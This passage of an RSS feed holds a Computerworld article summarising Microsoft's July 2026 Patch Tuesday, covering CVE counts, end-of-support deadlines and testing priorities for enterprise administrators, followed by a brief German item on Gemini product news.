<li><a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a> synchronization error details suppressed (Windows Server 2025 and 2022) – WSUS no longer displays synchronization error details in its error reporting, a deliberate change made to address the Remote Code Execution Vulnerability <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287">CVE-2025-59287</a>. Sync still works, but administrators triaging a failed synchronization lose the detail pane and must fall back to the SoftwareDistribution logs.</li>
</ul>



<p class="wp-block-paragraph">Windows Update can still replace manually installed graphics drivers with older OEM versions from the catalogue (the four-part Hardware ID ranking issue acknowledged on the <a href="https://techcommunity.microsoft.com/blog/hardware-dev-center/updated-graphics-driver-publishing-policy-from-4-part-to-2-part-hwid--chid-targe/4519070">Hardware Dev Center</a>). The two-part HWID pilot runs to September 2026.</p>



<h2 class="wp-block-heading">Major revisions and mitigations</h2>



<p class="wp-block-paragraph">Between the June and July Patch Tuesdays, MSRC Security Update Guide notices updated 651 reported CVEs across six notification dates (15, 19, 26 June and 3, 8, 11 July), 532 of them routine Chromium upstream re-publications. Of the roughly 30 Microsoft revisions, almost all were cross-platform Office catch-up with no bearing on a Windows enterprise estate. No further action required for IT administrators for this Windows update cycle.</p>



<h2 class="wp-block-heading">Windows lifecycle and enforcement updates</h2>



<p class="wp-block-paragraph">This is the deadline cycle June pointed at. The July end-of-support wave lands today, and it collides with the month’s heaviest patching. <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a> take some of their most active security updates ever on platforms receiving their last.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2016">SharePoint Server 2016</a> and <a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2019">2019</a>, <a href="https://learn.microsoft.com/en-us/lifecycle/products/project-server-2016">Project Server 2016</a> and 2019, <a href="https://learn.microsoft.com/en-us/lifecycle/products/sql-server-2016">SQL Server 2016</a> and InfoPath 2013 have all reached end of support. SQL Server 2014 ESU Year 2 reaches end of support today. SharePoint 2016/2019 take an actively exploited zero-day and two RCEs this cycle, and SQL Server 2016 takes a critical RCE, all as their final security update. Now is the time to get moving on updating these platforms.</li>
</ul>



<p class="wp-block-paragraph">The 2011 Secure Boot certificate expiries have now passed; devices that never took the Windows UEFI CA 2023 key updates under <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932">CVE-2023-24932</a> can no longer receive updated boot components, with the Windows Production PCA for the boot manager still ahead on 19 October 2026. <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview">Kerberos</a> RC4 hardening (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20833">CVE-2026-20833</a>) has been in enforcement since April 2026; the July 2026 update removes the RC4DefaultDisablementPhase rollback control that let administrators defer it, making enforcement final.</p>



<p class="wp-block-paragraph">Microsoft’s <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> is a security-only release: 180 test-guidance entries, 14 of them high risk (June had one). Printing and graphics are the centre of gravity: win32kfull.sys, the kernel-mode window manager, is the most-patched binary (14 entries), and seven high-risk flags sit alongside it – the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components">Print Spooler</a>, four win32k entries, and two <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start">GDI+</a> metafile entries. <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> is the second theme, with 10 entries, two high risk. Every entry reports no functional changes – it’s pure regression validation. The packages span Windows 11 26H1 back to Server 2012 ESU.</p>



<h2 class="wp-block-heading">Printing and graphics (high risk)</h2>



<p class="wp-block-paragraph">The Print Spooler flag centres on shared printers, whose queue status must track jobs accurately; the win32k flags cover 32-bit application printing, font rendering in printed and exported output, on-screen rendering, and window management; the GDI+ flags cover metafiles.</p>



<ul class="wp-block-list">
<li>Share a printer from a print server, print from a separate client in varied sizes and formats, and cancel a job, confirming the queue reflects every state change</li>



<li>Print from your 32-bit applications, and print text-heavy, graphics-heavy, and multi-page documents to physical and virtual (PDF or XPS) printers, repeating after orientation, scaling, and resolution changes</li>



<li>Export documents with varied fonts to PDF and confirm fonts and layout survive; render EMF+ files that apply effects to very large images, and convert EMF files to WMF</li>



<li>Open and close windows rapidly, drive common dialogs by mouse and keyboard, and close parents with children open – no orphaned windows</li>
</ul>



<h2 class="wp-block-heading">Storage and file systems (high risk)</h2>



<p class="wp-block-paragraph">Both NTFS high-risk flags target integrity – extended attributes, and volume recovery after an unexpected shutdown. File History carries its own high-risk flag on clients. A Windows Server 2025-only bundle across boot, <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a>, and <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> demands the full Secure Boot/BitLocker matrix. Eight entries hit Server 2025 alone, including WSL, GPU partitioning, and a scripted Windows Server Backup pass repeating recovery after rolling the date 90 days forward.</p>



<ul class="wp-block-list">
<li>Exercise NTFS extended attributes – older-system EAs, backup workflows that preserve them, concurrent same-file operations where supported – with antivirus, encryption, or storage filters active</li>



<li>Simulate an unexpected shutdown during file activity, verify the volume mounts intact, run chkdsk, and confirm indexing, shadow copies, and backup still work</li>



<li>Run a full File History pass: back up, modify and back up again, exclude folders, change frequency, move the destination</li>



<li>On Server 2025, boot all four Secure Boot/BitLocker combinations, in standard and confidential VMs where supported</li>
</ul>



<h2 class="wp-block-heading">Devices, input and networking (high risk)</h2>



<p class="wp-block-paragraph">Three further high-risk flags land here: HID input (hidparse.sys with win32k) – touch, keyboard, mouse, touchpad, through disconnects and restarts; the WinSock bundle (afd.sys plus Bluetooth and multicast drivers); and IrDA. The heaviest ask is not high risk at all: the NetAdapterCx driver (24H2/25H2, Server 2025) wants 500-plus adapter enable-disable cycles under Driver Verifier.</p>



<ul class="wp-block-list">
<li>Run the connectivity suite: browsing, large downloads, mapped drives, an RDP session idle 30+ minutes, a Teams call, an hour of streaming, and localhost apps such as Docker or WSL</li>



<li>Stress Bluetooth: pairing, 10+ minutes of audio, input after idle, and reconnection after sleep</li>



<li>Where infrared hardware exists, transfer a file and run at least 100 connect-disconnect cycles</li>



<li>Sweep the rest: DNS Server (zone data must stay under its configured database directory), the client resolver (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> Server (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB</a>, <a href="https://learn.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview">NFS</a>, Message Queuing (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-access/remote-access">RRAS</a> administration, client VPN, and WinHTTP/WinINet consumers</li>
</ul>



<h2 class="wp-block-heading">Other windows components</h2>



<p class="wp-block-paragraph">Windows Installer itself is patched: testing should include application install, uninstall, repair, and force a rollback. <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> wants virtual-switch traffic as part of its testing exercises with Virtual Filtering Platform policies enforced. Sixteen media-related security entries cover playback, HEVC and MPEG-TS, USB audio, and MIDI 2.0.</p>



<h2 class="wp-block-heading">Shell hardening and LSA isolation</h2>



<p class="wp-block-paragraph">These two entries are a little different from the rest of the cycle: they ask you to confirm a security behaviour actively works, not just that nothing regressed. A pass here means the protection fired, so treat them as functional checks rather than box-ticking.</p>



<ul class="wp-block-list">
<li>Shortcut handling (windows.storage.dll; Windows 11 23H2 and earlier, plus Server 2022): drop a shortcut file carrying the <a href="https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked">Mark of the Web</a> into a folder and confirm the system refuses to extract its icon and leaks no <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview">NTLM</a> credential hash – include the zero-click paths, where the icon would otherwise render without you opening anything</li>



<li>LSA isolation and KeyGuard (24H2/25H2, Server 2025): run the supplied PowerShell validation script, which turns on <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">Virtualization-based Security</a> if it isn’t already, exercises KeyGuard key operations in both required and best-effort isolation modes, and reports pass or fail – it needs TPM 2.0, UEFI with Secure Boot disabled, and PowerShell 7</li>



<li>Run that script on a dedicated test machine, never a shared one: it enables test signing, disables automatic updates, and reboots without asking</li>
</ul>



<h2 class="wp-block-heading">Office &amp; SharePoint</h2>



<p class="wp-block-paragraph">July’s <a href="https://learn.microsoft.com/en-us/office/">Office</a> wave is security-only; everything landed on 14 July, and nothing critical or non-security shipped in the 7 July preview. It’s an MSI-only cycle, so <a href="https://learn.microsoft.com/en-us/deployoffice/overview-office-deployment-tool">Click-to-Run</a> estates can sit this one out.</p>



<ul class="wp-block-list">
<li>On MSI Office 2016, apply the client updates – <a href="https://learn.microsoft.com/en-us/office/client-developer/excel/excel-home">Excel</a> (KB5002886), <a href="https://learn.microsoft.com/en-us/office/client-developer/word/word-home">Word</a> (KB5002890), PowerPoint (KB5002867), and five further Office 2016 security updates (<a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002273">KB5002273</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002887">KB5002887</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002748">KB5002748</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002857">KB5002857</a>, <a href="https://support.microsoft.com/en-us/servicing/office/update/2026/5002830">KB5002830</a>) – then exercise macros, external data, embedded objects, and any line-of-business add-ins</li>



<li>On <a href="https://learn.microsoft.com/en-us/sharepoint/sharepoint-server">SharePoint Server</a>, patch 2016 (KB5002891, plus the KB5002892 language pack) and Subscription Edition (KB5002882), then check browser-based editing; the guidance lists SharePoint 2019 with a baseline but ships no 2019 package, so there is nothing to install there</li>
</ul>



<p class="wp-block-paragraph">Mind the rollback rules before you schedule the window: most client updates can be uninstalled, but the server updates cannot and always require a reboot.</p>



<h2 class="wp-block-heading">Developer tools &amp; databases</h2>



<p class="wp-block-paragraph">The developer estate gets a broad but low-drama sweep this month. Both .NET and SQL Server patch widely, but the ask is representative-application validation rather than anything exotic – install on the matching branch and confirm normal behaviour.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/dotnet/core/sdk">.NET</a>: install the SDK updates (8.0.423, 9.0.316, 10.0.302, x64 and x86) and the Framework rollups spanning 3.5 through 4.8.1 – which reach from Windows Server 2012 up to Windows 11 26H1 and Server 2025 – then run a representative set of applications and confirm they function normally</li>



<li><a href="https://learn.microsoft.com/en-us/sql/sql-server/">SQL Server</a>: the <a href="https://learn.microsoft.com/en-us/troubleshoot/sql/releases/servicing-models-sql-server">GDR</a> updates span 2016 SP3 through 2025 – install each on its matching branch and test that each removes cleanly</li>



<li>Check an encrypted client connection through the separately patched Windows SQL client (dbnetlib.dll), which ships outside the server branches</li>
</ul>



<p class="wp-block-paragraph">The Readiness team recommends the following priorities for your larger enterprise deployments:</p>



<ul class="wp-block-list">
<li>Start with printing and graphics: half the high-risk flags sit in the Print Spooler, win32k, and GDI+, so regress shared printers, 32-bit printing, PDF export, metafiles, and window management before anything else</li>



<li>Take NTFS next – extended attributes and crash recovery both touch data integrity – and add a client File History backup-and-restore pass</li>



<li>Give Server 2025 its wider matrix – the Secure Boot/BitLocker combinations, WSL, GPU partitioning, and the scripted backup pass – and work through the stress suites</li>



<li>Run the scripted KeyGuard validation on any <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a> estate, preferably on a dedicated machine.</li>
</ul>



<p class="wp-block-paragraph">Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings:</p>



<ul class="wp-block-list">
<li>Browsers (Microsoft IE and Edge)</li>



<li>Microsoft Windows (both desktop and server)</li>



<li>Microsoft Office</li>



<li>Microsoft Exchange and SQL Server</li>



<li>Microsoft Developer Tools (Visual Studio and .NET)</li>



<li>Adobe (if you get this far)</li>
</ul>



<h2 class="wp-block-heading">Browsers</h2>



<p class="wp-block-paragraph">Edge has had a busier month than usual. Microsoft addressed 46 <a href="https://learn.microsoft.com/en-us/deployedge/microsoft-edge-for-business">Microsoft Edge</a> (Chromium-based) CVEs this cycle. None critical, but heavily weighted to remote code execution (21 entries) and spoofing (13), led by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289">CVE-2026-58289</a>, a remote code execution flaw. A run of further RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981">CVE-2026-57981</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645">CVE-2026-56645</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974">CVE-2026-57974</a>) follows.</p>



<ul class="wp-block-list">
<li>Microsoft Edge – the Edge-specific fixes ship in the Edge stable channel (version 150.0.4078.65, released 9 July). The concentration of RCE and spoofing this month is worth a look for managed Edge estates rather than a routine wave-through.</li>



<li>Chromium upstream – 427 CVEs relayed through MSRC this cycle, spanning the weekly Chrome release cadence since the June report: use-after-free, out-of-bounds read/write, type confusion, and inappropriate-implementation flaws across V8, Dawn, ANGLE, Skia, and Tint. The same fixes ship in the Chrome Stable channel; see the <a href="https://chromereleases.googleblog.com/">Chrome releases blog</a> for the upstream notes.</li>
</ul>



<p class="wp-block-paragraph">The Chromium volume looks (quite) alarming but is routine plumbing: it flows to Edge through its own auto-update channel. Add these browser (Edge) updates to your standard release schedule for your managed environments.</p>



<h2 class="wp-block-heading">Microsoft Windows</h2>



<p class="wp-block-paragraph">Windows carries the bulk of this month’s updates: 406 CVEs, 31 rated critical and 374 important. Elevation of privilege dominates by volume (226 entries), followed by remote code execution (70), information disclosure (70), denial of service (23), and a scatter of security-feature-bypass, tampering, and spoofing entries across the following feature groupings:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> – the standout network cluster: DHCP Server remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50518">CVE-2026-50518</a>, “Exploitation More Likely,” and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56159">CVE-2026-56159</a>), with further critical DHCP Server and DHCP Client RCEs behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48564">CVE-2026-48564</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50370">CVE-2026-50370</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54128">CVE-2026-54128</a>). DHCP servers are the deployment priority.</li>



<li><a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/virtual-switch">VMSwitch</a> and <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> – the Windows VMSwitch elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) is one of the month’s highest-severity flaws, joined by two critical Hyper-V elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50680">CVE-2026-50680</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54127">CVE-2026-54127</a>), guest-to-host risk on virtualisation hosts.</li>



<li>Network stack RCE – a Windows Server Network driver RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56188">CVE-2026-56188</a>, “Exploitation More Likely”), plus <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/tcpip-addressing-and-subnetting">TCP/IP</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54999">CVE-2026-54999</a>), the Reliable Multicast Transport Driver (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54982">CVE-2026-54982</a>), and SSTP (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50694">CVE-2026-50694</a>).</li>



<li>Graphics – Windows <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-overview-of-gdi--about">GDI+</a> remote code execution (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50380">CVE-2026-50380</a>) and a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/display/directx-graphics-kernel-subsystem">DirectX Graphics Kernel</a> RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50382">CVE-2026-50382</a>), both reachable through document-rendering paths.</li>



<li>Windows Media – a large cluster: three critical <a href="https://learn.microsoft.com/en-us/windows/win32/medfound/microsoft-media-foundation-sdk">Media Foundation</a> RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57090">CVE-2026-57090</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57094">CVE-2026-57094</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57087">CVE-2026-57087</a>) lead 14 Windows Media and seven Media Foundation entries overall.</li>



<li>Identity infrastructure – beyond the exploited ADFS flaw, <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">Active Directory Domain Services</a> takes a critical RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) and <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-certificate-services-overview">Active Directory Certificate Services</a> a critical elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>). Domain controllers take priority again.</li>



<li><a href="https://learn.microsoft.com/en-us/windows/win32/printdocs/print-spooler">Print Spooler</a>, <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a>, and MSMQ – critical RCE/EoP in the Print Spooler (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58608">CVE-2026-58608</a>), <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">Windows Server Update Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50444">CVE-2026-50444</a>), and <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/overview-of-message-queuing-services-architecture">Message Queuing</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54992">CVE-2026-54992</a>, “Exploitation More Likely”), all server-role attack surface.</li>
</ul>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/windows-kernel-mode-kernel-library">Windows Kernel</a> is the most-patched component (28 CVEs, seven “More Likely”), followed by <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> (21), Windows Runtime (17), Windows Media (14), <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> (12), and Win32k (15 across its two entries). Add this Windows update to your Patch Now deployment schedule.</p>



<h2 class="wp-block-heading">Microsoft Office</h2>



<p class="wp-block-paragraph">Microsoft released 96 Office CVEs this month: 19 critical, 76 important. Remote code execution leads (53 entries), ahead of information disclosure (27) and spoofing (10). <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> is the centre of gravity: it touches 39 of the 96 CVEs and supplies the family’s one actively exploited flaw.</p>



<ul class="wp-block-list">
<li>SharePoint Server: has been exploited (who would have guessed) and reaches end of support today. <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, an elevation of privilege, is under active exploitation. Above it sit two critical remote code execution flaws, both “Exploitation More Likely” (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522">CVE-2026-50522</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644">CVE-2026-58644</a>) and a critical security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55040">CVE-2026-55040</a>). SharePoint Server 2016 and 2019 reach end of support on 14 July, so this exploited, critical-heavy set is the final security update those on-premises farms will receive.</li>



<li>Office has experienced a long run of critical remote code execution entries across Office, Word, and PowerPoint (among them <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55033">CVE-2026-55033</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55127">CVE-2026-55127</a> in Word, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55043">CVE-2026-55043</a> in PowerPoint, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55018">CVE-2026-55018</a> in Office), topped by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55045">CVE-2026-55045</a>.</li>
</ul>



<p class="wp-block-paragraph">With an exploited zero-day, two RCEs, and an end-of-support deadline all landing on SharePoint in the same cycle, SharePoint environments are the priority. Add the July Office and SharePoint updates to your Patch Now schedule.</p>



<h2 class="wp-block-heading">Microsoft Exchange and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a></h2>



<p class="wp-block-paragraph">Both Exchange and SQL Server carry critical-rated security vulnerabilities this month. <a href="https://learn.microsoft.com/en-us/exchange/">Exchange Server</a> returns with an on-premises security update for Exchange Server Subscription Edition, the only on-premises release still supported after Exchange Server 2016 and 2019 reached end of support in October 2025; SQL Server takes two critical remote code execution flaws, one of them against SQL Server 2016, which reaches end of support on the same day.</p>



<ul class="wp-block-list">
<li>Exchange Server (on-premises) – <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>, a spoofing vulnerability rated critical and “Exploitation More Likely,” is the headline. Behind it, a remote code execution entry (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55005">CVE-2026-55005</a>) and two elevation-of-privilege flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55006">CVE-2026-55006</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55009">CVE-2026-55009</a>) round out the on-premises set. A separate Exchange Online elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54998">CVE-2026-54998</a>, critical) is fixed service-side with no customer action.</li>



<li>SQL Server – two critical remote code execution flaws: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a> (SQL Server 2025) and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> (which reaches back to SQL Server 2016 SP3), with five further important elevation-of-privilege and information-disclosure entries behind them. The 2016 exposure matters because SQL Server 2016 reaches end of support on 14 July: a critical RCE on a platform taking its final update.</li>
</ul>



<p class="wp-block-paragraph">Both belong on the Patch Now schedule this month: the Exchange on-premises update for its critical spoofing flaw, and the SQL Server update for the two critical RCEs.</p>



<h2 class="wp-block-heading">Microsoft developer tools</h2>



<p class="wp-block-paragraph">Microsoft released 24 CVEs across its developer tooling this month, all rated important. The weighting shifts from last month’s <a href="https://code.visualstudio.com/">Visual Studio Code</a> concentration toward <a href="https://learn.microsoft.com/en-us/dotnet/core/introduction">.NET</a> and <a href="https://learn.microsoft.com/en-us/aspnet/core/overview?view=aspnetcore-10.0">ASP.NET Core</a>, where a run of denial-of-service entries dominates the volume:</p>



<ul class="wp-block-list">
<li>ASP.NET Core and .NET – the two highest-severity entries are ASP.NET Core elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47300">CVE-2026-47300</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47303">CVE-2026-47303</a>), ahead of a .NET security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50528">CVE-2026-50528</a>) and two .NET / .NET Framework remote code execution flaws (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50646">CVE-2026-50646</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50649">CVE-2026-50649</a>).</li>



<li><a href="https://learn.microsoft.com/en-us/visualstudio/get-started/visual-studio-ide?view=visualstudio">Visual Studio</a> and VS Code – a GitHub Copilot / Visual Studio Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109">CVE-2026-41109</a>) and a second VS Code security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57102">CVE-2026-57102</a>) lead here, with a VS Code remote code execution entry behind them (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50520">CVE-2026-50520</a>) and a Visual Studio RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47305">CVE-2026-47305</a>).</li>
</ul>



<p class="wp-block-paragraph">Add these Microsoft updates to your standard developer update release schedule.</p>



<h2 class="wp-block-heading">Adobe (and third-party updates)</h2>



<p class="wp-block-paragraph">Outside Microsoft’s own catalogue, July is quiet. Adobe issued no Acrobat or Reader security updates. So, the month belongs to Microsoft, and it is a heavy one: 722 CVEs, roughly three times a normal cycle and one of the largest on record. Worth noting that this lands in the same season Microsoft has been talking up AI-assisted vulnerability management, and the AI stack it is selling as the answer, Copilot and Azure OpenAI among them, sits in the centre of this patch cycle’s own critical-rated updates. The (AI) tooling may be getting smarter, but the patch pile is (definitely) not getting smaller. This may be the beginning of an accelerating curve of ever larger patch cycles. My feeling is that we are in the middle of the beginning of this coming patch surge.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.computerworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gemini Update: Gemini Notebook, KI-Speicher bald nicht mehr kostenlos, Gemini Omni, Nano Banana 2 Lite]]></title>
<description><![CDATA[Wir haben das Ende der Gemini-Woche erreicht, die uns eine Reihe von Themen gebracht hat, über die wir berichten konnten: Das NotebookLM erhält einen neuen Namen, wir spekulieren über kostenpflichtigen KI-Speicher, zeigen euch Gemini Omni in Google Fotos und zeigen euch Nano Banana 2 Lite. Das al...]]></description>
<link>https://tsecurity.de/de/3676371/it-nachrichten/gemini-update-gemini-notebook-ki-speicher-bald-nicht-mehr-kostenlos-gemini-omni-nano-banana-2-lite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676371/it-nachrichten/gemini-update-gemini-notebook-ki-speicher-bald-nicht-mehr-kostenlos-gemini-omni-nano-banana-2-lite/</guid>
<pubDate>Fri, 17 Jul 2026 17:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="361" src="https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-1024x578.jpg" class="attachment-large size-large wp-post-image" alt="gemini import logo" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-1024x578.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-768x433.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-640x361.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo-800x451.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/gemini-import-logo.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Wir haben das Ende der Gemini-Woche erreicht, die uns eine Reihe von Themen gebracht hat, über die wir berichten konnten: Das NotebookLM erhält einen neuen Namen, wir spekulieren über kostenpflichtigen KI-Speicher, zeigen euch Gemini Omni in Google Fotos und zeigen euch Nano Banana 2 Lite. Das alles und mehr könnt ihr in unserem wöchentlichen <a href="https://www.googlewatchblog.de/2026/07/gmail-live-gemini-neue-ki-funktion-durchsucht-euren-posteingang-nach-konkreten-informationen-video/"><strong>Gemini Update</strong></a> nachlesen, in dem wir alle wichtigen Themen der Woche übersichtlich zusammenfassen.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/gemini-update-jul2026-drei/">Gemini Update: Gemini Notebook, KI-Speicher bald nicht mehr kostenlos, Gemini Omni, Nano Banana 2 Lite</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/72e54f2c55a04f999569afb6ea048eea"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/72e54f2c55a04f999569afb6ea048eea" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/gemini-update-jul2026-drei/">Gemini Update: Gemini Notebook, KI-Speicher bald nicht mehr kostenlos, Gemini Omni, Nano Banana 2 Lite</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Aus kostenlos wird kostenpflichtig: Microsoft verschiebt weitere Outlook-Funktion zu Copilot]]></title>
